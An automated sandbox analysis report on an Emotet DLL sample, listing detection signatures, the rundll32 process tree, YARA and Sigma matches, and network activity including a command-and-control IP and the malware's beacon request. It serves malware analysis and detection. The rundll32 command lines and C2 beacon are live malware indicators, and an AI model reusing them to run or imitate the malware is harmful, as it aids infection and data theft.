Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report IGidwJjoUs

Overview

General Information

Sample Name:IGidwJjoUs (renamed file extension from none to dll)
Analysis ID:532314
MD5:daf0060326338fd3d153248ca89b40e5
SHA1:b11244a64678d1e8280b7daf273cb0563ee51803
SHA256:e9f7e82f30ad5350adb0ad37ac11bc26ae7f3b0879fe33e2a23c97f158c85780
Tags:32dllexe
Infos:

Most interesting Screenshot:

Detection

Emotet
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Sigma detected: Emotet RunDLL32 Process Creation
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Abnormal high CPU Usage
AV process strings found (often used to terminate AV products)
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6888 cmdline: loaddll32.exe "C:\Users\user\Desktop\IGidwJjoUs.dll" MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 6908 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\IGidwJjoUs.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6932 cmdline: rundll32.exe "C:\Users\user\Desktop\IGidwJjoUs.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 5624 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\IGidwJjoUs.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6920 cmdline: rundll32.exe C:\Users\user\Desktop\IGidwJjoUs.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 6496 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cwisdx\vimpwfmepmyc.nyd",czAZWAgsaZPj MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 6128 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Cwisdx\vimpwfmepmyc.nyd",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6988 cmdline: rundll32.exe C:\Users\user\Desktop\IGidwJjoUs.dll,ajkaibu MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 5228 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\IGidwJjoUs.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 7000 cmdline: rundll32.exe C:\Users\user\Desktop\IGidwJjoUs.dll,akyncbgollmj MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 6572 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\IGidwJjoUs.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • WerFault.exe (PID: 7052 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6888 -s 308 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 3144 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6888 -s 304 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 5996 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 6596 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6888 -ip 6888 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 6948 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6888 -ip 6888 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 5528 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6240 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5644 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4588 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.913568790.0000000001020000.00000040.00000010.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000003.00000002.913568790.0000000001020000.00000040.00000010.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000000.00000000.939956990.0000000001170000.00000040.00000010.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000000.00000000.939956990.0000000001170000.00000040.00000010.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000006.00000002.930364249.00000000003B0000.00000040.00000010.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            Click to see the 30 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            12.2.rundll32.exe.10b0000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              12.2.rundll32.exe.10b0000.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                3.2.rundll32.exe.1020000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  3.2.rundll32.exe.1020000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    0.0.loaddll32.exe.1170000.9.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                      Click to see the 75 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Emotet RunDLL32 Process CreationShow sources
                      Source: Process startedAuthor: FPT.EagleEye: Data: Command: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Cwisdx\vimpwfmepmyc.nyd",Control_RunDLL, CommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Cwisdx\vimpwfmepmyc.nyd",Control_RunDLL, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cwisdx\vimpwfmepmyc.nyd",czAZWAgsaZPj, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 6496, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Cwisdx\vimpwfmepmyc.nyd",Control_RunDLL, ProcessId: 6128

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: IGidwJjoUs.dllVirustotal: Detection: 18%Perma Link
                      Source: IGidwJjoUs.dllReversingLabs: Detection: 17%
                      Source: IGidwJjoUs.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                      Source: unknownHTTPS traffic detected: 45.63.5.129:443 -> 192.168.2.4:49794 version: TLS 1.2
                      Source: IGidwJjoUs.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: aUojrXoCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000011.00000002.954537444.0000000000492000.00000004.00000001.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000011.00000003.946657846.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.966528838.0000000004CD1000.00000004.00000001.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000011.00000003.946657846.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.966528838.0000000004CD1000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000011.00000003.946657846.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.944571126.0000000000891000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.944524592.0000000000DEA000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.944726193.0000000000891000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.966528838.0000000004CD1000.00000004.00000001.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000011.00000003.946657846.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.966528838.0000000004CD1000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000011.00000003.946657846.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.944963869.0000000000897000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.944733553.0000000000897000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.944575719.0000000000897000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.966528838.0000000004CD1000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000011.00000003.946657846.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.966528838.0000000004CD1000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000011.00000003.944963869.0000000000897000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.944733553.0000000000897000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.944575719.0000000000897000.00000004.00000001.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000011.00000003.946657846.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.966528838.0000000004CD1000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000011.00000003.946657846.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.944564783.000000000088B000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.945060966.000000000088B000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.966528838.0000000004CD1000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000011.00000003.944571126.0000000000891000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.944726193.0000000000891000.00000004.00000001.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000011.00000003.946657846.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.966528838.0000000004CD1000.00000004.00000001.sdmp
                      Source: Binary string: upwntdll.pdb source: WerFault.exe, 00000014.00000003.962626767.00000000048D5000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.962922934.00000000048D5000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000011.00000003.946657846.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.966528838.0000000004CD1000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000011.00000003.946657846.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.966528838.0000000004CD1000.00000004.00000001.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000011.00000003.946657846.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.966528838.0000000004CD1000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000011.00000003.944564783.000000000088B000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.945060966.000000000088B000.00000004.00000001.sdmp
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7C0927 FindFirstFileExW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E7C0927 FindFirstFileExW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00ECE2C8 FindFirstFileW,

                      Networking:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.63.5.129 187
                      Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                      Source: global trafficHTTP traffic detected: GET /vIcMmPpXrabVVBXOJgaOKuPeOcCKPXUIh HTTP/1.1Cookie: HR=hcy/hRyH9NLoEyk6a7Uz59hOb7mzlO/wmgmuw+U+8hB3e4M76BBMZiQXdzL+rOvzb1yL3LfyOSim45PynOuCpUIZnQ5cZmHqs7SQt9O7zwz4xkXcg6/oRkU7EE5sPE10xFi1y7VDx9Ov7ygmxpemyuKnLT/gv0JB9m9mcmPDhKiVbEhBpBiGTYaZoGTSg6tFd1fI6MMeVezZeVD7pkX8i8U0SqwAVpQnS4Y1xB1iegh6pXp4tFE7gJs9t6T5v6aI71n7DxNMxlhyB7kHYd2tzisWwB/rDwKlrXgJBvRGWdLzEoTJug==Host: 45.63.5.129Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: svchost.exe, 0000001F.00000003.1157345476.0000015108B84000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.facebook.com (Facebook)
                      Source: svchost.exe, 0000001F.00000003.1157345476.0000015108B84000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.twitter.com (Twitter)
                      Source: svchost.exe, 0000001F.00000003.1157497409.0000015108B8B000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.1157345476.0000015108B84000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.1156938699.0000015108B97000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-11-26T13:57:30.0386475Z||.||6f0c105d-3db6-47de-894d-fd95973349e2||1152921505694224549||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                      Source: svchost.exe, 0000001F.00000003.1157497409.0000015108B8B000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.1157345476.0000015108B84000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.1156938699.0000015108B97000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-11-26T13:57:30.0386475Z||.||6f0c105d-3db6-47de-894d-fd95973349e2||1152921505694224549||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                      Source: WerFault.exe, 00000014.00000002.988862312.0000000004911000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.986850979.0000000004911000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000002.1175308900.0000015108B0D000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.1160420267.0000015108B0C000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: svchost.exe, 0000001F.00000002.1175003928.00000151084EB000.00000004.00000001.sdmpString found in binary or memory: http://crl.ver)
                      Source: svchost.exe, 0000001F.00000003.1150795758.0000015108B8F000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.1150829061.0000015108BD0000.00000004.00000001.sdmpString found in binary or memory: http://help.disneyplus.com.
                      Source: Amcache.hve.17.drString found in binary or memory: http://upx.sf.net
                      Source: svchost.exe, 0000001F.00000003.1150795758.0000015108B8F000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.1150829061.0000015108BD0000.00000004.00000001.sdmpString found in binary or memory: https://disneyplus.com/legal.
                      Source: svchost.exe, 0000001F.00000003.1150795758.0000015108B8F000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.1150829061.0000015108BD0000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: svchost.exe, 0000001F.00000003.1150795758.0000015108B8F000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.1150829061.0000015108BD0000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: svchost.exe, 0000001F.00000003.1153314663.0000015108B7E000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.1153380650.0000015109002000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.1153337846.0000015108B8F000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.1153407395.0000015108B7E000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB3394 InternetReadFile,
                      Source: global trafficHTTP traffic detected: GET /vIcMmPpXrabVVBXOJgaOKuPeOcCKPXUIh HTTP/1.1Cookie: HR=hcy/hRyH9NLoEyk6a7Uz59hOb7mzlO/wmgmuw+U+8hB3e4M76BBMZiQXdzL+rOvzb1yL3LfyOSim45PynOuCpUIZnQ5cZmHqs7SQt9O7zwz4xkXcg6/oRkU7EE5sPE10xFi1y7VDx9Ov7ygmxpemyuKnLT/gv0JB9m9mcmPDhKiVbEhBpBiGTYaZoGTSg6tFd1fI6MMeVezZeVD7pkX8i8U0SqwAVpQnS4Y1xB1iegh6pXp4tFE7gJs9t6T5v6aI71n7DxNMxlhyB7kHYd2tzisWwB/rDwKlrXgJBvRGWdLzEoTJug==Host: 45.63.5.129Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownHTTPS traffic detected: 45.63.5.129:443 -> 192.168.2.4:49794 version: TLS 1.2

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 12.2.rundll32.exe.10b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.1020000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1170000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1170000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.1170000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1203908.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.dd3740.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.3b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1203908.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1203908.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.1203908.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1170000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.rundll32.exe.eb0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.dd3740.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1203908.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1203908.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1170000.0.raw.unpack, type: UNPACKEDPE
